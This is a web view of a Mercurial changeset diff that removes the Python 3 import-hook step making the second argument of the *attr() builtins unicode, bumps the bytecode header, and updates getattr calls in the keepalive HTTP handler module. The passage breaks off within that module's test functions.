##// END OF EJS Templates
py3: stop normalizing 2nd argument of *attr() to unicode...
Gregory Szorc -
r43373:c95b2f40 default
parent child Browse files
Show More
@@ -1,259 +1,208
1 1 # __init__.py - Startup and module loading logic for Mercurial.
2 2 #
3 3 # Copyright 2015 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import sys
11 11
12 12 # Allow 'from mercurial import demandimport' to keep working.
13 13 import hgdemandimport
14 14
15 15 demandimport = hgdemandimport
16 16
17 17 __all__ = []
18 18
19 19 # Python 3 uses a custom module loader that transforms source code between
20 20 # source file reading and compilation. This is done by registering a custom
21 21 # finder that changes the spec for Mercurial modules to use a custom loader.
22 22 if sys.version_info[0] >= 3:
23 23 import importlib
24 24 import importlib.abc
25 25 import io
26 26 import token
27 27 import tokenize
28 28
29 29 class hgpathentryfinder(importlib.abc.MetaPathFinder):
30 30 """A sys.meta_path finder that uses a custom module loader."""
31 31
32 32 def find_spec(self, fullname, path, target=None):
33 33 # Only handle Mercurial-related modules.
34 34 if not fullname.startswith(('mercurial.', 'hgext.')):
35 35 return None
36 36 # don't try to parse binary
37 37 if fullname.startswith('mercurial.cext.'):
38 38 return None
39 39 # third-party packages are expected to be dual-version clean
40 40 if fullname.startswith('mercurial.thirdparty'):
41 41 return None
42 42 # zstd is already dual-version clean, don't try and mangle it
43 43 if fullname.startswith('mercurial.zstd'):
44 44 return None
45 45 # rustext is built for the right python version,
46 46 # don't try and mangle it
47 47 if fullname.startswith('mercurial.rustext'):
48 48 return None
49 49 # pywatchman is already dual-version clean, don't try and mangle it
50 50 if fullname.startswith('hgext.fsmonitor.pywatchman'):
51 51 return None
52 52
53 53 # Try to find the module using other registered finders.
54 54 spec = None
55 55 for finder in sys.meta_path:
56 56 if finder == self:
57 57 continue
58 58
59 59 # Originally the API was a `find_module` method, but it was
60 60 # renamed to `find_spec` in python 3.4, with a new `target`
61 61 # argument.
62 62 find_spec_method = getattr(finder, 'find_spec', None)
63 63 if find_spec_method:
64 64 spec = find_spec_method(fullname, path, target=target)
65 65 else:
66 66 spec = finder.find_module(fullname)
67 67 if spec is not None:
68 68 spec = importlib.util.spec_from_loader(fullname, spec)
69 69 if spec:
70 70 break
71 71
72 72 # This is a Mercurial-related module but we couldn't find it
73 73 # using the previously-registered finders. This likely means
74 74 # the module doesn't exist.
75 75 if not spec:
76 76 return None
77 77
78 78 # TODO need to support loaders from alternate specs, like zip
79 79 # loaders.
80 80 loader = hgloader(spec.name, spec.origin)
81 81 # Can't use util.safehasattr here because that would require
82 82 # importing util, and we're in import code.
83 83 if hasattr(spec.loader, 'loader'): # hasattr-py3-only
84 84 # This is a nested loader (maybe a lazy loader?)
85 85 spec.loader.loader = loader
86 86 else:
87 87 spec.loader = loader
88 88 return spec
89 89
90 90 def replacetokens(tokens, fullname):
91 91 """Transform a stream of tokens from raw to Python 3.
92 92
93 93 It is called by the custom module loading machinery to rewrite
94 94 source/tokens between source decoding and compilation.
95 95
96 96 Returns a generator of possibly rewritten tokens.
97 97
98 98 The input token list may be mutated as part of processing. However,
99 99 its changes do not necessarily match the output token stream.
100 100
101 101 REMEMBER TO CHANGE ``BYTECODEHEADER`` WHEN CHANGING THIS FUNCTION
102 102 OR CACHED FILES WON'T GET INVALIDATED PROPERLY.
103 103 """
104 104 # The following utility functions access the tokens list and i index of
105 105 # the for i, t enumerate(tokens) loop below
106 106 def _isop(j, *o):
107 107 """Assert that tokens[j] is an OP with one of the given values"""
108 108 try:
109 109 return tokens[j].type == token.OP and tokens[j].string in o
110 110 except IndexError:
111 111 return False
112 112
113 def _findargnofcall(n):
114 """Find arg n of a call expression (start at 0)
115
116 Returns index of the first token of that argument, or None if
117 there is not that many arguments.
118
119 Assumes that token[i + 1] is '('.
120
121 """
122 nested = 0
123 for j in range(i + 2, len(tokens)):
124 if _isop(j, ')', ']', '}'):
125 # end of call, tuple, subscription or dict / set
126 nested -= 1
127 if nested < 0:
128 return None
129 elif n == 0:
130 # this is the starting position of arg
131 return j
132 elif _isop(j, '(', '[', '{'):
133 nested += 1
134 elif _isop(j, ',') and nested == 0:
135 n -= 1
136
137 return None
138
139 def _ensureunicode(j):
140 """Make sure the token at j is a unicode string
141
142 This rewrites a string token to include the unicode literal prefix
143 so the string transformer won't add the byte prefix.
144
145 Ignores tokens that are not strings. Assumes bounds checking has
146 already been done.
147
148 """
149 st = tokens[j]
150 if st.type == token.STRING and st.string.startswith(("'", '"')):
151 tokens[j] = st._replace(string='u%s' % st.string)
152
153 113 for i, t in enumerate(tokens):
154 114 # This looks like a function call.
155 115 if t.type == token.NAME and _isop(i + 1, '('):
156 116 fn = t.string
157 117
158 # *attr() builtins don't accept byte strings to 2nd argument.
159 if fn in (
160 'getattr',
161 'setattr',
162 'hasattr',
163 'safehasattr',
164 ) and not _isop(i - 1, '.'):
165 arg1idx = _findargnofcall(1)
166 if arg1idx is not None:
167 _ensureunicode(arg1idx)
168
169 118 # It changes iteritems/values to items/values as they are not
170 119 # present in Python 3 world.
171 elif fn in ('iteritems', 'itervalues') and not (
120 if fn in ('iteritems', 'itervalues') and not (
172 121 tokens[i - 1].type == token.NAME
173 122 and tokens[i - 1].string == 'def'
174 123 ):
175 124 yield t._replace(string=fn[4:])
176 125 continue
177 126
178 127 # Emit unmodified token.
179 128 yield t
180 129
181 130 # Header to add to bytecode files. This MUST be changed when
182 131 # ``replacetoken`` or any mechanism that changes semantics of module
183 132 # loading is changed. Otherwise cached bytecode may get loaded without
184 133 # the new transformation mechanisms applied.
185 BYTECODEHEADER = b'HG\x00\x13'
134 BYTECODEHEADER = b'HG\x00\x14'
186 135
187 136 class hgloader(importlib.machinery.SourceFileLoader):
188 137 """Custom module loader that transforms source code.
189 138
190 139 When the source code is converted to a code object, we transform
191 140 certain patterns to be Python 3 compatible. This allows us to write code
192 141 that is natively Python 2 and compatible with Python 3 without
193 142 making the code excessively ugly.
194 143
195 144 We do this by transforming the token stream between parse and compile.
196 145
197 146 Implementing transformations invalidates caching assumptions made
198 147 by the built-in importer. The built-in importer stores a header on
199 148 saved bytecode files indicating the Python/bytecode version. If the
200 149 version changes, the cached bytecode is ignored. The Mercurial
201 150 transformations could change at any time. This means we need to check
202 151 that cached bytecode was generated with the current transformation
203 152 code or there could be a mismatch between cached bytecode and what
204 153 would be generated from this class.
205 154
206 155 We supplement the bytecode caching layer by wrapping ``get_data``
207 156 and ``set_data``. These functions are called when the
208 157 ``SourceFileLoader`` retrieves and saves bytecode cache files,
209 158 respectively. We simply add an additional header on the file. As
210 159 long as the version in this file is changed when semantics change,
211 160 cached bytecode should be invalidated when transformations change.
212 161
213 162 The added header has the form ``HG<VERSION>``. That is a literal
214 163 ``HG`` with 2 binary bytes indicating the transformation version.
215 164 """
216 165
217 166 def get_data(self, path):
218 167 data = super(hgloader, self).get_data(path)
219 168
220 169 if not path.endswith(tuple(importlib.machinery.BYTECODE_SUFFIXES)):
221 170 return data
222 171
223 172 # There should be a header indicating the Mercurial transformation
224 173 # version. If it doesn't exist or doesn't match the current version,
225 174 # we raise an OSError because that is what
226 175 # ``SourceFileLoader.get_code()`` expects when loading bytecode
227 176 # paths to indicate the cached file is "bad."
228 177 if data[0:2] != b'HG':
229 178 raise OSError('no hg header')
230 179 if data[0:4] != BYTECODEHEADER:
231 180 raise OSError('hg header version mismatch')
232 181
233 182 return data[4:]
234 183
235 184 def set_data(self, path, data, *args, **kwargs):
236 185 if path.endswith(tuple(importlib.machinery.BYTECODE_SUFFIXES)):
237 186 data = BYTECODEHEADER + data
238 187
239 188 return super(hgloader, self).set_data(path, data, *args, **kwargs)
240 189
241 190 def source_to_code(self, data, path):
242 191 """Perform token transformation before compilation."""
243 192 buf = io.BytesIO(data)
244 193 tokens = tokenize.tokenize(buf.readline)
245 194 data = tokenize.untokenize(replacetokens(list(tokens), self.name))
246 195 # Python's built-in importer strips frames from exceptions raised
247 196 # for this code. Unfortunately, that mechanism isn't extensible
248 197 # and our frame will be blamed for the import failure. There
249 198 # are extremely hacky ways to do frame stripping. We haven't
250 199 # implemented them because they are very ugly.
251 200 return super(hgloader, self).source_to_code(data, path)
252 201
253 202 # We automagically register our custom importer as a side-effect of
254 203 # loading. This is necessary to ensure that any entry points are able
255 204 # to import mercurial.* modules without having to perform this
256 205 # registration themselves.
257 206 if not any(isinstance(x, hgpathentryfinder) for x in sys.meta_path):
258 207 # meta_path is used before any implicit finders and before sys.path.
259 208 sys.meta_path.insert(0, hgpathentryfinder())
@@ -1,848 +1,848
1 1 # This library is free software; you can redistribute it and/or
2 2 # modify it under the terms of the GNU Lesser General Public
3 3 # License as published by the Free Software Foundation; either
4 4 # version 2.1 of the License, or (at your option) any later version.
5 5 #
6 6 # This library is distributed in the hope that it will be useful,
7 7 # but WITHOUT ANY WARRANTY; without even the implied warranty of
8 8 # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
9 9 # Lesser General Public License for more details.
10 10 #
11 11 # You should have received a copy of the GNU Lesser General Public
12 12 # License along with this library; if not, see
13 13 # <http://www.gnu.org/licenses/>.
14 14
15 15 # This file is part of urlgrabber, a high-level cross-protocol url-grabber
16 16 # Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko
17 17
18 18 # Modified by Benoit Boissinot:
19 19 # - fix for digest auth (inspired from urllib2.py @ Python v2.4)
20 20 # Modified by Dirkjan Ochtman:
21 21 # - import md5 function from a local util module
22 22 # Modified by Augie Fackler:
23 23 # - add safesend method and use it to prevent broken pipe errors
24 24 # on large POST requests
25 25
26 26 """An HTTP handler for urllib2 that supports HTTP 1.1 and keepalive.
27 27
28 28 >>> import urllib2
29 29 >>> from keepalive import HTTPHandler
30 30 >>> keepalive_handler = HTTPHandler()
31 31 >>> opener = urlreq.buildopener(keepalive_handler)
32 32 >>> urlreq.installopener(opener)
33 33 >>>
34 34 >>> fo = urlreq.urlopen('http://www.python.org')
35 35
36 36 If a connection to a given host is requested, and all of the existing
37 37 connections are still in use, another connection will be opened. If
38 38 the handler tries to use an existing connection but it fails in some
39 39 way, it will be closed and removed from the pool.
40 40
41 41 To remove the handler, simply re-run build_opener with no arguments, and
42 42 install that opener.
43 43
44 44 You can explicitly close connections by using the close_connection()
45 45 method of the returned file-like object (described below) or you can
46 46 use the handler methods:
47 47
48 48 close_connection(host)
49 49 close_all()
50 50 open_connections()
51 51
52 52 NOTE: using the close_connection and close_all methods of the handler
53 53 should be done with care when using multiple threads.
54 54 * there is nothing that prevents another thread from creating new
55 55 connections immediately after connections are closed
56 56 * no checks are done to prevent in-use connections from being closed
57 57
58 58 >>> keepalive_handler.close_all()
59 59
60 60 EXTRA ATTRIBUTES AND METHODS
61 61
62 62 Upon a status of 200, the object returned has a few additional
63 63 attributes and methods, which should not be used if you want to
64 64 remain consistent with the normal urllib2-returned objects:
65 65
66 66 close_connection() - close the connection to the host
67 67 readlines() - you know, readlines()
68 68 status - the return status (i.e. 404)
69 69 reason - english translation of status (i.e. 'File not found')
70 70
71 71 If you want the best of both worlds, use this inside an
72 72 AttributeError-catching try:
73 73
74 74 >>> try: status = fo.status
75 75 >>> except AttributeError: status = None
76 76
77 77 Unfortunately, these are ONLY there if status == 200, so it's not
78 78 easy to distinguish between non-200 responses. The reason is that
79 79 urllib2 tries to do clever things with error codes 301, 302, 401,
80 80 and 407, and it wraps the object upon return.
81 81 """
82 82
83 83 # $Id: keepalive.py,v 1.14 2006/04/04 21:00:32 mstenner Exp $
84 84
85 85 from __future__ import absolute_import, print_function
86 86
87 87 import collections
88 88 import errno
89 89 import hashlib
90 90 import socket
91 91 import sys
92 92 import threading
93 93
94 94 from .i18n import _
95 95 from .pycompat import getattr
96 96 from . import (
97 97 node,
98 98 pycompat,
99 99 urllibcompat,
100 100 util,
101 101 )
102 102 from .utils import procutil
103 103
104 104 httplib = util.httplib
105 105 urlerr = util.urlerr
106 106 urlreq = util.urlreq
107 107
108 108 DEBUG = None
109 109
110 110
111 111 class ConnectionManager(object):
112 112 """
113 113 The connection manager must be able to:
114 114 * keep track of all existing
115 115 """
116 116
117 117 def __init__(self):
118 118 self._lock = threading.Lock()
119 119 self._hostmap = collections.defaultdict(list) # host -> [connection]
120 120 self._connmap = {} # map connections to host
121 121 self._readymap = {} # map connection to ready state
122 122
123 123 def add(self, host, connection, ready):
124 124 self._lock.acquire()
125 125 try:
126 126 self._hostmap[host].append(connection)
127 127 self._connmap[connection] = host
128 128 self._readymap[connection] = ready
129 129 finally:
130 130 self._lock.release()
131 131
132 132 def remove(self, connection):
133 133 self._lock.acquire()
134 134 try:
135 135 try:
136 136 host = self._connmap[connection]
137 137 except KeyError:
138 138 pass
139 139 else:
140 140 del self._connmap[connection]
141 141 del self._readymap[connection]
142 142 self._hostmap[host].remove(connection)
143 143 if not self._hostmap[host]:
144 144 del self._hostmap[host]
145 145 finally:
146 146 self._lock.release()
147 147
148 148 def set_ready(self, connection, ready):
149 149 try:
150 150 self._readymap[connection] = ready
151 151 except KeyError:
152 152 pass
153 153
154 154 def get_ready_conn(self, host):
155 155 conn = None
156 156 self._lock.acquire()
157 157 try:
158 158 for c in self._hostmap[host]:
159 159 if self._readymap[c]:
160 160 self._readymap[c] = False
161 161 conn = c
162 162 break
163 163 finally:
164 164 self._lock.release()
165 165 return conn
166 166
167 167 def get_all(self, host=None):
168 168 if host:
169 169 return list(self._hostmap[host])
170 170 else:
171 171 return dict(self._hostmap)
172 172
173 173
174 174 class KeepAliveHandler(object):
175 175 def __init__(self, timeout=None):
176 176 self._cm = ConnectionManager()
177 177 self._timeout = timeout
178 178 self.requestscount = 0
179 179 self.sentbytescount = 0
180 180
181 181 #### Connection Management
182 182 def open_connections(self):
183 183 """return a list of connected hosts and the number of connections
184 184 to each. [('foo.com:80', 2), ('bar.org', 1)]"""
185 185 return [(host, len(li)) for (host, li) in self._cm.get_all().items()]
186 186
187 187 def close_connection(self, host):
188 188 """close connection(s) to <host>
189 189 host is the host:port spec, as in 'www.cnn.com:8080' as passed in.
190 190 no error occurs if there is no connection to that host."""
191 191 for h in self._cm.get_all(host):
192 192 self._cm.remove(h)
193 193 h.close()
194 194
195 195 def close_all(self):
196 196 """close all open connections"""
197 197 for host, conns in self._cm.get_all().iteritems():
198 198 for h in conns:
199 199 self._cm.remove(h)
200 200 h.close()
201 201
202 202 def _request_closed(self, request, host, connection):
203 203 """tells us that this request is now closed and that the
204 204 connection is ready for another request"""
205 205 self._cm.set_ready(connection, True)
206 206
207 207 def _remove_connection(self, host, connection, close=0):
208 208 if close:
209 209 connection.close()
210 210 self._cm.remove(connection)
211 211
212 212 #### Transaction Execution
213 213 def http_open(self, req):
214 214 return self.do_open(HTTPConnection, req)
215 215
216 216 def do_open(self, http_class, req):
217 217 host = urllibcompat.gethost(req)
218 218 if not host:
219 219 raise urlerr.urlerror(b'no host given')
220 220
221 221 try:
222 222 h = self._cm.get_ready_conn(host)
223 223 while h:
224 224 r = self._reuse_connection(h, req, host)
225 225
226 226 # if this response is non-None, then it worked and we're
227 227 # done. Break out, skipping the else block.
228 228 if r:
229 229 break
230 230
231 231 # connection is bad - possibly closed by server
232 232 # discard it and ask for the next free connection
233 233 h.close()
234 234 self._cm.remove(h)
235 235 h = self._cm.get_ready_conn(host)
236 236 else:
237 237 # no (working) free connections were found. Create a new one.
238 238 h = http_class(host, timeout=self._timeout)
239 239 if DEBUG:
240 240 DEBUG.info(
241 241 b"creating new connection to %s (%d)", host, id(h)
242 242 )
243 243 self._cm.add(host, h, False)
244 244 self._start_transaction(h, req)
245 245 r = h.getresponse()
246 246 # The string form of BadStatusLine is the status line. Add some context
247 247 # to make the error message slightly more useful.
248 248 except httplib.BadStatusLine as err:
249 249 raise urlerr.urlerror(
250 250 _(b'bad HTTP status line: %s') % pycompat.sysbytes(err.line)
251 251 )
252 252 except (socket.error, httplib.HTTPException) as err:
253 253 raise urlerr.urlerror(err)
254 254
255 255 # If not a persistent connection, don't try to reuse it. Look
256 256 # for this using getattr() since vcr doesn't define this
257 257 # attribute, and in that case always close the connection.
258 if getattr(r, r'will_close', True):
258 if getattr(r, 'will_close', True):
259 259 self._cm.remove(h)
260 260
261 261 if DEBUG:
262 262 DEBUG.info(b"STATUS: %s, %s", r.status, r.reason)
263 263 r._handler = self
264 264 r._host = host
265 265 r._url = req.get_full_url()
266 266 r._connection = h
267 267 r.code = r.status
268 268 r.headers = r.msg
269 269 r.msg = r.reason
270 270
271 271 return r
272 272
273 273 def _reuse_connection(self, h, req, host):
274 274 """start the transaction with a re-used connection
275 275 return a response object (r) upon success or None on failure.
276 276 This DOES not close or remove bad connections in cases where
277 277 it returns. However, if an unexpected exception occurs, it
278 278 will close and remove the connection before re-raising.
279 279 """
280 280 try:
281 281 self._start_transaction(h, req)
282 282 r = h.getresponse()
283 283 # note: just because we got something back doesn't mean it
284 284 # worked. We'll check the version below, too.
285 285 except (socket.error, httplib.HTTPException):
286 286 r = None
287 287 except: # re-raises
288 288 # adding this block just in case we've missed
289 289 # something we will still raise the exception, but
290 290 # lets try and close the connection and remove it
291 291 # first. We previously got into a nasty loop
292 292 # where an exception was uncaught, and so the
293 293 # connection stayed open. On the next try, the
294 294 # same exception was raised, etc. The trade-off is
295 295 # that it's now possible this call will raise
296 296 # a DIFFERENT exception
297 297 if DEBUG:
298 298 DEBUG.error(
299 299 b"unexpected exception - closing " b"connection to %s (%d)",
300 300 host,
301 301 id(h),
302 302 )
303 303 self._cm.remove(h)
304 304 h.close()
305 305 raise
306 306
307 307 if r is None or r.version == 9:
308 308 # httplib falls back to assuming HTTP 0.9 if it gets a
309 309 # bad header back. This is most likely to happen if
310 310 # the socket has been closed by the server since we
311 311 # last used the connection.
312 312 if DEBUG:
313 313 DEBUG.info(
314 314 b"failed to re-use connection to %s (%d)", host, id(h)
315 315 )
316 316 r = None
317 317 else:
318 318 if DEBUG:
319 319 DEBUG.info(b"re-using connection to %s (%d)", host, id(h))
320 320
321 321 return r
322 322
323 323 def _start_transaction(self, h, req):
324 324 oldbytescount = getattr(h, 'sentbytescount', 0)
325 325
326 326 # What follows mostly reimplements HTTPConnection.request()
327 327 # except it adds self.parent.addheaders in the mix and sends headers
328 328 # in a deterministic order (to make testing easier).
329 329 headers = util.sortdict(self.parent.addheaders)
330 330 headers.update(sorted(req.headers.items()))
331 331 headers.update(sorted(req.unredirected_hdrs.items()))
332 332 headers = util.sortdict((n.lower(), v) for n, v in headers.items())
333 333 skipheaders = {}
334 334 for n in (r'host', r'accept-encoding'):
335 335 if n in headers:
336 336 skipheaders[r'skip_' + n.replace(r'-', r'_')] = 1
337 337 try:
338 338 if urllibcompat.hasdata(req):
339 339 data = urllibcompat.getdata(req)
340 340 h.putrequest(
341 341 req.get_method(),
342 342 urllibcompat.getselector(req),
343 343 **skipheaders
344 344 )
345 345 if r'content-type' not in headers:
346 346 h.putheader(
347 347 r'Content-type', r'application/x-www-form-urlencoded'
348 348 )
349 349 if r'content-length' not in headers:
350 350 h.putheader(r'Content-length', r'%d' % len(data))
351 351 else:
352 352 h.putrequest(
353 353 req.get_method(),
354 354 urllibcompat.getselector(req),
355 355 **skipheaders
356 356 )
357 357 except socket.error as err:
358 358 raise urlerr.urlerror(err)
359 359 for k, v in headers.items():
360 360 h.putheader(k, v)
361 361 h.endheaders()
362 362 if urllibcompat.hasdata(req):
363 363 h.send(data)
364 364
365 365 # This will fail to record events in case of I/O failure. That's OK.
366 366 self.requestscount += 1
367 367 self.sentbytescount += getattr(h, 'sentbytescount', 0) - oldbytescount
368 368
369 369 try:
370 370 self.parent.requestscount += 1
371 371 self.parent.sentbytescount += (
372 372 getattr(h, 'sentbytescount', 0) - oldbytescount
373 373 )
374 374 except AttributeError:
375 375 pass
376 376
377 377
378 378 class HTTPHandler(KeepAliveHandler, urlreq.httphandler):
379 379 pass
380 380
381 381
382 382 class HTTPResponse(httplib.HTTPResponse):
383 383 # we need to subclass HTTPResponse in order to
384 384 # 1) add readline(), readlines(), and readinto() methods
385 385 # 2) add close_connection() methods
386 386 # 3) add info() and geturl() methods
387 387
388 388 # in order to add readline(), read must be modified to deal with a
389 389 # buffer. example: readline must read a buffer and then spit back
390 390 # one line at a time. The only real alternative is to read one
391 391 # BYTE at a time (ick). Once something has been read, it can't be
392 392 # put back (ok, maybe it can, but that's even uglier than this),
393 393 # so if you THEN do a normal read, you must first take stuff from
394 394 # the buffer.
395 395
396 396 # the read method wraps the original to accommodate buffering,
397 397 # although read() never adds to the buffer.
398 398 # Both readline and readlines have been stolen with almost no
399 399 # modification from socket.py
400 400
401 401 def __init__(self, sock, debuglevel=0, strict=0, method=None):
402 402 extrakw = {}
403 403 if not pycompat.ispy3:
404 404 extrakw[r'strict'] = True
405 405 extrakw[r'buffering'] = True
406 406 httplib.HTTPResponse.__init__(
407 407 self, sock, debuglevel=debuglevel, method=method, **extrakw
408 408 )
409 409 self.fileno = sock.fileno
410 410 self.code = None
411 411 self.receivedbytescount = 0
412 412 self._rbuf = b''
413 413 self._rbufsize = 8096
414 414 self._handler = None # inserted by the handler later
415 415 self._host = None # (same)
416 416 self._url = None # (same)
417 417 self._connection = None # (same)
418 418
419 419 _raw_read = httplib.HTTPResponse.read
420 420 _raw_readinto = getattr(httplib.HTTPResponse, 'readinto', None)
421 421
422 422 # Python 2.7 has a single close() which closes the socket handle.
423 423 # This method was effectively renamed to _close_conn() in Python 3. But
424 424 # there is also a close(). _close_conn() is called by methods like
425 425 # read().
426 426
427 427 def close(self):
428 428 if self.fp:
429 429 self.fp.close()
430 430 self.fp = None
431 431 if self._handler:
432 432 self._handler._request_closed(
433 433 self, self._host, self._connection
434 434 )
435 435
436 436 def _close_conn(self):
437 437 self.close()
438 438
439 439 def close_connection(self):
440 440 self._handler._remove_connection(self._host, self._connection, close=1)
441 441 self.close()
442 442
443 443 def info(self):
444 444 return self.headers
445 445
446 446 def geturl(self):
447 447 return self._url
448 448
449 449 def read(self, amt=None):
450 450 # the _rbuf test is only in this first if for speed. It's not
451 451 # logically necessary
452 452 if self._rbuf and amt is not None:
453 453 L = len(self._rbuf)
454 454 if amt > L:
455 455 amt -= L
456 456 else:
457 457 s = self._rbuf[:amt]
458 458 self._rbuf = self._rbuf[amt:]
459 459 return s
460 460 # Careful! http.client.HTTPResponse.read() on Python 3 is
461 461 # implemented using readinto(), which can duplicate self._rbuf
462 462 # if it's not empty.
463 463 s = self._rbuf
464 464 self._rbuf = b''
465 465 data = self._raw_read(amt)
466 466
467 467 self.receivedbytescount += len(data)
468 468 try:
469 469 self._connection.receivedbytescount += len(data)
470 470 except AttributeError:
471 471 pass
472 472 try:
473 473 self._handler.parent.receivedbytescount += len(data)
474 474 except AttributeError:
475 475 pass
476 476
477 477 s += data
478 478 return s
479 479
480 480 # stolen from Python SVN #68532 to fix issue1088
481 481 def _read_chunked(self, amt):
482 482 chunk_left = self.chunk_left
483 483 parts = []
484 484
485 485 while True:
486 486 if chunk_left is None:
487 487 line = self.fp.readline()
488 488 i = line.find(b';')
489 489 if i >= 0:
490 490 line = line[:i] # strip chunk-extensions
491 491 try:
492 492 chunk_left = int(line, 16)
493 493 except ValueError:
494 494 # close the connection as protocol synchronization is
495 495 # probably lost
496 496 self.close()
497 497 raise httplib.IncompleteRead(b''.join(parts))
498 498 if chunk_left == 0:
499 499 break
500 500 if amt is None:
501 501 parts.append(self._safe_read(chunk_left))
502 502 elif amt < chunk_left:
503 503 parts.append(self._safe_read(amt))
504 504 self.chunk_left = chunk_left - amt
505 505 return b''.join(parts)
506 506 elif amt == chunk_left:
507 507 parts.append(self._safe_read(amt))
508 508 self._safe_read(2) # toss the CRLF at the end of the chunk
509 509 self.chunk_left = None
510 510 return b''.join(parts)
511 511 else:
512 512 parts.append(self._safe_read(chunk_left))
513 513 amt -= chunk_left
514 514
515 515 # we read the whole chunk, get another
516 516 self._safe_read(2) # toss the CRLF at the end of the chunk
517 517 chunk_left = None
518 518
519 519 # read and discard trailer up to the CRLF terminator
520 520 ### note: we shouldn't have any trailers!
521 521 while True:
522 522 line = self.fp.readline()
523 523 if not line:
524 524 # a vanishingly small number of sites EOF without
525 525 # sending the trailer
526 526 break
527 527 if line == b'\r\n':
528 528 break
529 529
530 530 # we read everything; close the "file"
531 531 self.close()
532 532
533 533 return b''.join(parts)
534 534
535 535 def readline(self):
536 536 # Fast path for a line is already available in read buffer.
537 537 i = self._rbuf.find(b'\n')
538 538 if i >= 0:
539 539 i += 1
540 540 line = self._rbuf[:i]
541 541 self._rbuf = self._rbuf[i:]
542 542 return line
543 543
544 544 # No newline in local buffer. Read until we find one.
545 545 chunks = [self._rbuf]
546 546 i = -1
547 547 readsize = self._rbufsize
548 548 while True:
549 549 new = self._raw_read(readsize)
550 550 if not new:
551 551 break
552 552
553 553 self.receivedbytescount += len(new)
554 554 self._connection.receivedbytescount += len(new)
555 555 try:
556 556 self._handler.parent.receivedbytescount += len(new)
557 557 except AttributeError:
558 558 pass
559 559
560 560 chunks.append(new)
561 561 i = new.find(b'\n')
562 562 if i >= 0:
563 563 break
564 564
565 565 # We either have exhausted the stream or have a newline in chunks[-1].
566 566
567 567 # EOF
568 568 if i == -1:
569 569 self._rbuf = b''
570 570 return b''.join(chunks)
571 571
572 572 i += 1
573 573 self._rbuf = chunks[-1][i:]
574 574 chunks[-1] = chunks[-1][:i]
575 575 return b''.join(chunks)
576 576
577 577 def readlines(self, sizehint=0):
578 578 total = 0
579 579 list = []
580 580 while True:
581 581 line = self.readline()
582 582 if not line:
583 583 break
584 584 list.append(line)
585 585 total += len(line)
586 586 if sizehint and total >= sizehint:
587 587 break
588 588 return list
589 589
590 590 def readinto(self, dest):
591 591 if self._raw_readinto is None:
592 592 res = self.read(len(dest))
593 593 if not res:
594 594 return 0
595 595 dest[0 : len(res)] = res
596 596 return len(res)
597 597 total = len(dest)
598 598 have = len(self._rbuf)
599 599 if have >= total:
600 600 dest[0:total] = self._rbuf[:total]
601 601 self._rbuf = self._rbuf[total:]
602 602 return total
603 603 mv = memoryview(dest)
604 604 got = self._raw_readinto(mv[have:total])
605 605
606 606 self.receivedbytescount += got
607 607 self._connection.receivedbytescount += got
608 608 try:
609 609 self._handler.receivedbytescount += got
610 610 except AttributeError:
611 611 pass
612 612
613 613 dest[0:have] = self._rbuf
614 614 got += len(self._rbuf)
615 615 self._rbuf = b''
616 616 return got
617 617
618 618
619 619 def safesend(self, str):
620 620 """Send `str' to the server.
621 621
622 622 Shamelessly ripped off from httplib to patch a bad behavior.
623 623 """
624 624 # _broken_pipe_resp is an attribute we set in this function
625 625 # if the socket is closed while we're sending data but
626 626 # the server sent us a response before hanging up.
627 627 # In that case, we want to pretend to send the rest of the
628 628 # outgoing data, and then let the user use getresponse()
629 629 # (which we wrap) to get this last response before
630 630 # opening a new socket.
631 631 if getattr(self, '_broken_pipe_resp', None) is not None:
632 632 return
633 633
634 634 if self.sock is None:
635 635 if self.auto_open:
636 636 self.connect()
637 637 else:
638 638 raise httplib.NotConnected
639 639
640 640 # send the data to the server. if we get a broken pipe, then close
641 641 # the socket. we want to reconnect when somebody tries to send again.
642 642 #
643 643 # NOTE: we DO propagate the error, though, because we cannot simply
644 644 # ignore the error... the caller will know if they can retry.
645 645 if self.debuglevel > 0:
646 646 print(b"send:", repr(str))
647 647 try:
648 648 blocksize = 8192
649 649 read = getattr(str, 'read', None)
650 650 if read is not None:
651 651 if self.debuglevel > 0:
652 652 print(b"sending a read()able")
653 653 data = read(blocksize)
654 654 while data:
655 655 self.sock.sendall(data)
656 656 self.sentbytescount += len(data)
657 657 data = read(blocksize)
658 658 else:
659 659 self.sock.sendall(str)
660 660 self.sentbytescount += len(str)
661 661 except socket.error as v:
662 662 reraise = True
663 663 if v.args[0] == errno.EPIPE: # Broken pipe
664 664 if self._HTTPConnection__state == httplib._CS_REQ_SENT:
665 665 self._broken_pipe_resp = None
666 666 self._broken_pipe_resp = self.getresponse()
667 667 reraise = False
668 668 self.close()
669 669 if reraise:
670 670 raise
671 671
672 672
673 673 def wrapgetresponse(cls):
674 674 """Wraps getresponse in cls with a broken-pipe sane version.
675 675 """
676 676
677 677 def safegetresponse(self):
678 678 # In safesend() we might set the _broken_pipe_resp
679 679 # attribute, in which case the socket has already
680 680 # been closed and we just need to give them the response
681 681 # back. Otherwise, we use the normal response path.
682 682 r = getattr(self, '_broken_pipe_resp', None)
683 683 if r is not None:
684 684 return r
685 685 return cls.getresponse(self)
686 686
687 687 safegetresponse.__doc__ = cls.getresponse.__doc__
688 688 return safegetresponse
689 689
690 690
691 691 class HTTPConnection(httplib.HTTPConnection):
692 692 # url.httpsconnection inherits from this. So when adding/removing
693 693 # attributes, be sure to audit httpsconnection() for unintended
694 694 # consequences.
695 695
696 696 # use the modified response class
697 697 response_class = HTTPResponse
698 698 send = safesend
699 699 getresponse = wrapgetresponse(httplib.HTTPConnection)
700 700
701 701 def __init__(self, *args, **kwargs):
702 702 httplib.HTTPConnection.__init__(self, *args, **kwargs)
703 703 self.sentbytescount = 0
704 704 self.receivedbytescount = 0
705 705
706 706
707 707 #########################################################################
708 708 ##### TEST FUNCTIONS
709 709 #########################################################################
710 710
711 711
712 712 def continuity(url):
713 713 md5 = hashlib.md5
714 714 format = b'%25s: %s'
715 715
716 716 # first fetch the file with the normal http handler
717 717 opener = urlreq.buildopener()
718 718 urlreq.installopener(opener)
719 719 fo = urlreq.urlopen(url)
720 720 foo = fo.read()
721 721 fo.close()
722 722 m = md5(foo)
723 723 print(format % (b'normal urllib', node.hex(m.digest())))
724 724
725 725 # now install the keepalive handler and try again
726 726 opener = urlreq.buildopener(HTTPHandler())
